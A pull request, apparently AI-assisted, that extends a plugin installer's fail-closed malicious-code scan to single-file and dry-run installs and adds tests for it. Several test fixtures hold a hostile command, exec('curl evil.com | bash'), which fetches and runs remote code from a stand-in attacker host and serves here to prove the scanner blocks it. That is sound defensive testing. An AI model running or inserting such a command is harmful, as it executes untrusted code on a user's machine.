### PR TITLE
fix(plugins): scan single-file and dry-run plugin installs (#2834)

### DIFF
--- a/src/commands/onboarding/plugin-install.ts
+++ b/src/commands/onboarding/plugin-install.ts
@@ -64,6 +64,38 @@ function resolveLocalPath(
   return null;
 }
 
+/**
+ * Registers a local plugin directory as a load path WITHOUT running the
+ * dangerous-code scanner that the npm / archive / path install flows enforce
+ * (see src/plugins/install.ts). This unscanned path is a deliberate, reviewed
+ * exception — not an oversight:
+ *
+ *   - `pluginPath` is never a user-typed path. It is resolved from the
+ *     first-party channel catalog (`entry.install.localPath`) or a bundled
+ *     plugin source shipped inside this repo — i.e. code we author and release,
+ *     not an arbitrary third-party plugin.
+ *   - The local option is only offered when a git workspace is present
+ *     (`hasGitWorkspace`) and the resolved path exists on disk — i.e. a
+ *     developer running from a checkout, not an end user.
+ *   - First-party channel plugins legitimately trip the scanner's critical
+ *     rules: e.g. the Signal plugin shells out to signal-cli via
+ *     child_process.spawn (extensions/signal/src/daemon.ts). Scanning-and-
+ *     blocking here would break that first-party flow, and the onboarding
+ *     wizard has no UI to set the `dangerouslyForceUnsafeInstall` override
+ *     (that override is CLI-only), so there would be no supported way to
+ *     proceed.
+ *
+ * Known residual: a catalog `localPath` is relative and resolved against the
+ * process CWD (`resolveLocalPath`), so a checkout whose CWD holds an
+ * attacker-controlled file at the catalog-relative location could be
+ * registered unscanned. Accepted for now given the git-workspace + existence
+ * gating above.
+ *
+ * REVISIT this exception if either changes: (a) the wizard gains a UI to set
+ * the force-unsafe override, or (b) `trustedSourceLinkedOfficialInstall`
+ * (already plumbed in cli/plugin-install-plan.ts) is consumed to scan-and-warn
+ * for catalog-verified sources. See issue #2834.
+ */
 function addPluginLoadPath(cfg: RemoteClawConfig, pluginPath: string): RemoteClawConfig {
   const existing = cfg.plugins?.load?.paths ?? [];
   const merged = Array.from(new Set([...existing, pluginPath]));
@@ -173,6 +205,8 @@ export async function ensureOnboardingPluginInstalled(params: {
   }
 
   if (choice === "local" && localPath) {
+    // Local path registered without a code-safety scan by design — first-party
+    // catalog/bundled source; see addPluginLoadPath and issue #2834.
     next = addPluginLoadPath(next, localPath);
     next = enablePluginInConfig(next, entry.id).config;
     return { cfg: next, installed: true };
@@ -210,6 +244,8 @@ export async function ensureOnboardingPluginInstalled(params: {
       initialValue: true,
     });
     if (fallback) {
+      // Local path registered without a code-safety scan by design — first-party
+      // catalog/bundled source; see addPluginLoadPath and issue #2834.
       next = addPluginLoadPath(next, localPath);
       next = enablePluginInConfig(next, entry.id).config;
       return { cfg: next, installed: true };

--- a/src/plugins/install.test.ts
+++ b/src/plugins/install.test.ts
@@ -219,6 +219,24 @@ async function installFromDirWithWarnings(params: {
   return { result, warnings };
 }
 
+async function installFromFileWithWarnings(params: {
+  filePath: string;
+  extensionsDir: string;
+  dangerouslyForceUnsafeInstall?: boolean;
+}) {
+  const warnings: string[] = [];
+  const result = await installPluginFromPath({
+    path: params.filePath,
+    extensionsDir: params.extensionsDir,
+    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
+    logger: {
+      info: () => {},
+      warn: (msg: string) => warnings.push(msg),
+    },
+  });
+  return { result, warnings };
+}
+
 function setupManifestInstallFixture(params: { manifestId: string }) {
   const caseDir = makeTempDir();
   const stateDir = path.join(caseDir, "state");
@@ -824,6 +842,158 @@ describe("installPluginFromPath", () => {
     }
     expect(result.error.toLowerCase()).toMatch(/hardlink|path alias escape/);
     expect(fs.readFileSync(victimPath, "utf-8")).toBe("ORIGINAL");
+  });
+
+  it("blocks installing a single-file plugin with dangerous code patterns", async () => {
+    const baseDir = makeTempDir();
+    const extensionsDir = path.join(baseDir, "extensions");
+    fs.mkdirSync(extensionsDir, { recursive: true });
+
+    const sourcePath = path.join(baseDir, "danger.js");
+    fs.writeFileSync(
+      sourcePath,
+      `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
+      "utf-8",
+    );
+
+    const { result, warnings } = await installFromFileWithWarnings({
+      filePath: sourcePath,
+      extensionsDir,
+    });
+
+    expect(result.ok).toBe(false);
+    if (result.ok) {
+      return;
+    }
+    expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED);
+    expect(result.error).toContain("dangerous code patterns");
+    expect(warnings.some((w) => w.includes("dangerous code pattern"))).toBe(true);
+    // The dangerous file must not have been copied into the extensions directory.
+    expect(fs.existsSync(path.join(extensionsDir, "danger.js"))).toBe(false);
+  });
+
+  it("installs a dangerous single-file plugin when dangerouslyForceUnsafeInstall is set", async () => {
+    const baseDir = makeTempDir();
+    const extensionsDir = path.join(baseDir, "extensions");
+    fs.mkdirSync(extensionsDir, { recursive: true });
+
+    const sourcePath = path.join(baseDir, "danger.js");
+    fs.writeFileSync(
+      sourcePath,
+      `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
+      "utf-8",
+    );
+
+    const { result, warnings } = await installFromFileWithWarnings({
+      filePath: sourcePath,
+      extensionsDir,
+      dangerouslyForceUnsafeInstall: true,
+    });
+
+    expect(result.ok).toBe(true);
+    expect(warnings.some((w) => w.includes("dangerous code pattern"))).toBe(true);
+    expect(warnings.some((w) => w.includes("--dangerously-force-unsafe-install"))).toBe(true);
+    // With the override, the file IS copied into the extensions directory.
+    expect(fs.existsSync(path.join(extensionsDir, "danger.js"))).toBe(true);
+  });
+
+  it("blocks a single-file plugin install when the scanner throws (fail-closed)", async () => {
+    const scanSpy = vi
+      .spyOn(skillScanner, "scanDirectoryWithSummary")
+      .mockRejectedValueOnce(new Error("scanner exploded"));
+
+    const baseDir = makeTempDir();
+    const extensionsDir = path.join(baseDir, "extensions");
+    fs.mkdirSync(extensionsDir, { recursive: true });
+
+    const sourcePath = path.join(baseDir, "safe.js");
+    fs.writeFileSync(sourcePath, "export {};\n", "utf-8");
+
+    const { result } = await installFromFileWithWarnings({
+      filePath: sourcePath,
+      extensionsDir,
+    });
+
+    expect(result.ok).toBe(false);
+    if (result.ok) {
+      return;
+    }
+    expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_FAILED);
+    expect(result.error).toContain("code safety scan failed");
+    expect(fs.existsSync(path.join(extensionsDir, "safe.js"))).toBe(false);
+    scanSpy.mockRestore();
+  });
+
+  it("blocks a non-scannable single-file plugin (fail-closed on no scan coverage)", async () => {
+    const baseDir = makeTempDir();
+    const extensionsDir = path.join(baseDir, "extensions");
+    fs.mkdirSync(extensionsDir, { recursive: true });
+
+    // A .txt file is not a scannable plugin file, so the scanner cannot certify
+    // it. The install must fail closed rather than copy it in unscanned.
+    const sourcePath = path.join(baseDir, "payload.txt");
+    fs.writeFileSync(sourcePath, "not scannable content", "utf-8");
+
+    const { result } = await installFromFileWithWarnings({
+      filePath: sourcePath,
+      extensionsDir,
+    });
+
+    expect(result.ok).toBe(false);
+    if (result.ok) {
+      return;
+    }
+    expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_FAILED);
+    expect(result.error).toContain("could not be scanned");
+    expect(fs.existsSync(path.join(extensionsDir, "payload.txt"))).toBe(false);
+  });
+
+  it("installs a non-scannable single-file plugin when dangerouslyForceUnsafeInstall is set", async () => {
+    const baseDir = makeTempDir();
+    const extensionsDir = path.join(baseDir, "extensions");
+    fs.mkdirSync(extensionsDir, { recursive: true });
+
+    const sourcePath = path.join(baseDir, "payload.txt");
+    fs.writeFileSync(sourcePath, "not scannable content", "utf-8");
+
+    const { result, warnings } = await installFromFileWithWarnings({
+      filePath: sourcePath,
+      extensionsDir,
+      dangerouslyForceUnsafeInstall: true,
+    });
+
+    expect(result.ok).toBe(true);
+    expect(warnings.some((w) => w.includes("could not be scanned"))).toBe(true);
+    // With the override, the unscannable file IS copied into the extensions directory.
+    expect(fs.existsSync(path.join(extensionsDir, "payload.txt"))).toBe(true);
+  });
+
+  it("blocks a dangerous single-file plugin even in dry-run (link probe is gated)", async () => {
+    const baseDir = makeTempDir();
+    const extensionsDir = path.join(baseDir, "extensions");
+    fs.mkdirSync(extensionsDir, { recursive: true });
+
+    const sourcePath = path.join(baseDir, "danger.js");
+    fs.writeFileSync(
+      sourcePath,
+      `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
+      "utf-8",
+    );
+
+    // `remoteclaw plugins install --link <file>` validates the path via
+    // installPluginFromPath({ dryRun: true }); the scan must gate that probe so
+    // a dangerous file is rejected before it can be linked.
+    const result = await installPluginFromPath({
+      path: sourcePath,
+      extensionsDir,
+      dryRun: true,
+    });
+
+    expect(result.ok).toBe(false);
+    if (result.ok) {
+      return;
+    }
+    expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED);
   });
 });
 

--- a/src/plugins/install.ts
+++ b/src/plugins/install.ts
@@ -161,7 +161,7 @@ type PackageInstallCommonParams = InstallSafetyOverrides & {
 
 type FileInstallCommonParams = Pick<
   PackageInstallCommonParams,
-  "extensionsDir" | "logger" | "mode" | "dryRun"
+  "extensionsDir" | "logger" | "mode" | "dryRun" | "dangerouslyForceUnsafeInstall"
 >;
 
 function pickPackageInstallCommonParams(
@@ -180,11 +180,104 @@ function pickPackageInstallCommonParams(
 
 function pickFileInstallCommonParams(params: FileInstallCommonParams): FileInstallCommonParams {
   return {
+    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     extensionsDir: params.extensionsDir,
     logger: params.logger,
     mode: params.mode,
     dryRun: params.dryRun,
   };
+}
+
+type InstallScanGateResult = { proceed: true } | { proceed: false; result: InstallPluginResult };
+
+/**
+ * Shared code-safety scan gate for every install path that copies plugin
+ * sources into the extensions directory. Installed plugins run in-process with
+ * full host capability (no sandbox), so this is the single source of truth for
+ * the fail-closed policy:
+ *   - critical findings BLOCK the install (SECURITY_SCAN_BLOCKED);
+ *   - a scanner error fails CLOSED (SECURITY_SCAN_FAILED);
+ *   - when `failClosedOnNoCoverage` is set (single-file installs, where the
+ *     whole plugin is one file), a target the scanner cannot certify — a
+ *     non-scannable extension or one over the size limit, so `scannedFiles === 0`
+ *     — also fails CLOSED (SECURITY_SCAN_FAILED) rather than silently proceeding
+ *     unscanned.
+ * Each branch is bypassable only by an explicit operator opt-in via
+ * `dangerouslyForceUnsafeInstall` after reviewing the findings.
+ */
+async function enforceInstallScanGate(params: {
+  scanDir: string;
+  includeFiles: string[];
+  onlyIncludeFiles: boolean;
+  failClosedOnNoCoverage: boolean;
+  pluginId: string;
+  logger: PluginInstallLogger;
+  forceUnsafeInstall: boolean;
+}): Promise<InstallScanGateResult> {
+  const { pluginId, logger, forceUnsafeInstall } = params;
+  try {
+    const scanSummary = await skillScanner.scanDirectoryWithSummary(params.scanDir, {
+      includeFiles: params.includeFiles,
+      onlyIncludeFiles: params.onlyIncludeFiles,
+    });
+    if (params.failClosedOnNoCoverage && scanSummary.scannedFiles === 0) {
+      if (!forceUnsafeInstall) {
+        return {
+          proceed: false,
+          result: {
+            ok: false,
+            error: `Plugin "${pluginId}" installation blocked: the file could not be scanned for dangerous code (not a scannable plugin file — expected .js/.ts/.mjs/.cjs/.mts/.cts/.jsx/.tsx — or it exceeds the scan size limit). Re-run with --dangerously-force-unsafe-install to override.`,
+            code: PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_FAILED,
+          },
+        };
+      }
+      logger.warn?.(
+        `Plugin "${pluginId}" could not be scanned for dangerous code. Proceeding because --dangerously-force-unsafe-install was set.`,
+      );
+      return { proceed: true };
+    }
+    if (scanSummary.critical > 0) {
+      const criticalDetails = scanSummary.findings
+        .filter((f) => f.severity === "critical")
+        .map((f) => `${f.message} (${f.file}:${f.line})`)
+        .join("; ");
+      logger.warn?.(
+        `WARNING: Plugin "${pluginId}" contains dangerous code patterns: ${criticalDetails}`,
+      );
+      if (!forceUnsafeInstall) {
+        return {
+          proceed: false,
+          result: {
+            ok: false,
+            error: `Plugin "${pluginId}" installation blocked: dangerous code patterns detected: ${criticalDetails}. Review the findings and re-run with --dangerously-force-unsafe-install to override.`,
+            code: PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED,
+          },
+        };
+      }
+      logger.warn?.(
+        `Proceeding with install of "${pluginId}" despite critical findings because --dangerously-force-unsafe-install was set.`,
+      );
+    } else if (scanSummary.warn > 0) {
+      logger.warn?.(
+        `Plugin "${pluginId}" has ${scanSummary.warn} suspicious code pattern(s). Run "remoteclaw security audit --deep" for details.`,
+      );
+    }
+  } catch (err) {
+    if (!forceUnsafeInstall) {
+      return {
+        proceed: false,
+        result: {
+          ok: false,
+          error: `Plugin "${pluginId}" installation blocked: code safety scan failed (${String(err)}). Run "remoteclaw security audit --deep" for details, or re-run with --dangerously-force-unsafe-install to override.`,
+          code: PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_FAILED,
+        },
+      };
+    }
+    logger.warn?.(
+      `Plugin "${pluginId}" code safety scan failed (${String(err)}). Proceeding because --dangerously-force-unsafe-install was set.`,
+    );
+  }
+  return { proceed: true };
 }
 
 export function resolvePluginInstallDir(pluginId: string, extensionsDir?: string): string {
@@ -285,50 +378,22 @@ async function installPluginFromPackageDir(
     forcedScanEntries.push(resolvedEntry);
   }
 
-  // Scan plugin source for dangerous code patterns. Installed plugins run
-  // in-process with full host capability (no sandbox), so critical findings
-  // BLOCK the install and a scanner error fails CLOSED — both unless the
-  // operator has explicitly opted into an unsafe install after reviewing the
-  // findings via dangerouslyForceUnsafeInstall.
-  const forceUnsafeInstall = params.dangerouslyForceUnsafeInstall === true;
-  try {
-    const scanSummary = await skillScanner.scanDirectoryWithSummary(params.packageDir, {
-      includeFiles: forcedScanEntries,
-    });
-    if (scanSummary.critical > 0) {
-      const criticalDetails = scanSummary.findings
-        .filter((f) => f.severity === "critical")
-        .map((f) => `${f.message} (${f.file}:${f.line})`)
-        .join("; ");
-      logger.warn?.(
-        `WARNING: Plugin "${pluginId}" contains dangerous code patterns: ${criticalDetails}`,
-      );
-      if (!forceUnsafeInstall) {
-        return {
-          ok: false,
-          error: `Plugin "${pluginId}" installation blocked: dangerous code patterns detected: ${criticalDetails}. Review the findings and re-run with --dangerously-force-unsafe-install to override.`,
-          code: PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED,
-        };
-      }
-      logger.warn?.(
-        `Proceeding with install of "${pluginId}" despite critical findings because --dangerously-force-unsafe-install was set.`,
-      );
-    } else if (scanSummary.warn > 0) {
-      logger.warn?.(
-        `Plugin "${pluginId}" has ${scanSummary.warn} suspicious code pattern(s). Run "remoteclaw security audit --deep" for details.`,
-      );
-    }
-  } catch (err) {
-    if (!forceUnsafeInstall) {
-      return {
-        ok: false,
-        error: `Plugin "${pluginId}" installation blocked: code safety scan failed (${String(err)}). Run "remoteclaw security audit --deep" for details, or re-run with --dangerously-force-unsafe-install to override.`,
-        code: PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_FAILED,
-      };
-    }
-    logger.warn?.(
-      `Plugin "${pluginId}" code safety scan failed (${String(err)}). Proceeding because --dangerously-force-unsafe-install was set.`,
-    );
+  // Scan plugin source for dangerous code patterns before copying it into the
+  // extensions directory. Installed plugins run in-process with full host
+  // capability (no sandbox), so enforceInstallScanGate blocks on critical
+  // findings and fails closed on scanner errors — both unless the operator has
+  // explicitly opted into an unsafe install via dangerouslyForceUnsafeInstall.
+  const packageScanGate = await enforceInstallScanGate({
+    scanDir: params.packageDir,
+    includeFiles: forcedScanEntries,
+    onlyIncludeFiles: false,
+    failClosedOnNoCoverage: false,
+    pluginId,
+    logger,
+    forceUnsafeInstall: params.dangerouslyForceUnsafeInstall === true,
+  });
+  if (!packageScanGate.proceed) {
+    return packageScanGate.result;
   }
 
   const extensionsDir = params.extensionsDir
@@ -463,6 +528,7 @@ export async function installPluginFromFile(params: {
   logger?: PluginInstallLogger;
   mode?: "install" | "update";
   dryRun?: boolean;
+  dangerouslyForceUnsafeInstall?: boolean;
 }): Promise<InstallPluginResult> {
   const { logger, mode, dryRun } = resolveInstallModeOptions(params, defaultLogger);
 
@@ -482,6 +548,25 @@ export async function installPluginFromFile(params: {
   if (pluginIdError) {
     return { ok: false, error: pluginIdError };
   }
+
+  // Scan the single plugin file for dangerous code before copying it into the
+  // extensions directory (mirrors the package-directory install path). The scan
+  // runs ahead of the dry-run early-return below so that a `--link <file>`
+  // probe — which reaches here via installPluginFromPath({ dryRun: true }) — is
+  // gated too. failClosedOnNoCoverage rejects a file the scanner cannot certify.
+  const fileScanGate = await enforceInstallScanGate({
+    scanDir: path.dirname(filePath),
+    includeFiles: [filePath],
+    onlyIncludeFiles: true,
+    failClosedOnNoCoverage: true,
+    pluginId,
+    logger,
+    forceUnsafeInstall: params.dangerouslyForceUnsafeInstall === true,
+  });
+  if (!fileScanGate.proceed) {
+    return fileScanGate.result;
+  }
+
   const targetFile = path.join(extensionsDir, `${safeFileName(pluginId)}${path.extname(filePath)}`);
 
   const availability = await ensureInstallTargetAvailable({


### PR DESCRIPTION
## Summary

PR #2833 hardened the **package-directory** install path to block on critical dangerous-code findings and fail closed on scanner errors. This extends the same fail-closed guarantee to the two install paths #2833 left unscanned, closing #2834.

## What changed

**Single-file installs are now scanned (`installPluginFromFile` / `installPluginFromPath`).**
Installing a single file (`remoteclaw plugins install ./plugin.js`, or `--link ./plugin.js`) previously copied it into the extensions directory with no dangerous-code scan. It now runs the same scan the package-directory path uses:

- critical findings BLOCK the install (`security_scan_blocked`);
- a scanner error fails CLOSED (`security_scan_failed`);
- a file the scanner cannot certify — a non-scannable extension, or one over the scan size limit (i.e. `scannedFiles === 0`) — also fails CLOSED rather than silently proceeding unscanned;
- all three are bypassable only by the explicit `--dangerously-force-unsafe-install` operator override (the same flag #2833 added).

The scan runs **ahead of the dry-run early-return**, so the `--link <file>` validation probe (which calls the install path with `dryRun: true`) is gated too — a dangerous file is rejected before it can be linked.

The package-directory and single-file paths now share one `enforceInstallScanGate` helper, giving the fail-closed policy a single source of truth. Package-directory behavior is unchanged — its existing tests pass as-is.

**Onboarding local-path registration: reviewed, deliberately left unscanned (documented).**
The onboarding wizard's "use local plugin path" option (the primary choice and the npm-failure fallback) registers a load path without scanning. This was reviewed and is a deliberate, documented exception rather than a gap to close:

- the path is never user-typed — it comes from the first-party channel catalog or a bundled plugin source shipped in this repo;
- it is only offered inside a git checkout (git-workspace + on-disk existence gated);
- first-party channel plugins legitimately use `child_process` (e.g. the Signal plugin shells out to `signal-cli`), so scanning-and-blocking here would break a legitimate first-party flow — and the wizard has no UI to set the force-unsafe override (that override is CLI-only), so there would be no supported way to proceed.

A code comment at the registration site records the rationale, the known residual (a relative catalog path resolved against the process CWD), and the conditions under which the exception should be revisited.

## Tests

`src/plugins/install.test.ts` adds single-file coverage mirroring #2833's package-directory tests:

- a single-file install of a real dangerous payload (`exec("curl … | bash")`) is BLOCKED with `security_scan_blocked` and is NOT copied into the extensions directory;
- the same install with `--dangerously-force-unsafe-install` succeeds;
- a single-file install fails CLOSED (`security_scan_failed`) when the scanner throws, and when the file is non-scannable — each bypassable by the override;
- a dangerous file is blocked even in dry-run (the `--link` probe is gated).

`pnpm check` (format, typecheck, lint) passes.

## Follow-up (out of scope for this PR)

While tracing the onboarding path I found an **unreferenced duplicate** of the onboarding plugin-install module: a second copy lives at a legacy path, is imported by nothing, and its exported `ensureOnboardingPluginInstalled` is shadowed by the live copy the wizard actually uses. Upstream sync keeps updating the unused copy, so it has drifted ahead of the live one. It should be reconciled (removed, or its relevant deltas folded into the live module) — left for whoever owns upstream sync, because a future change that re-wires the dead copy would silently reintroduce an unscanned load-path install and bypass this fail-closed gate.

Closes #2834

🤖 Generated with [Claude Code](https://claude.com/claude-code)
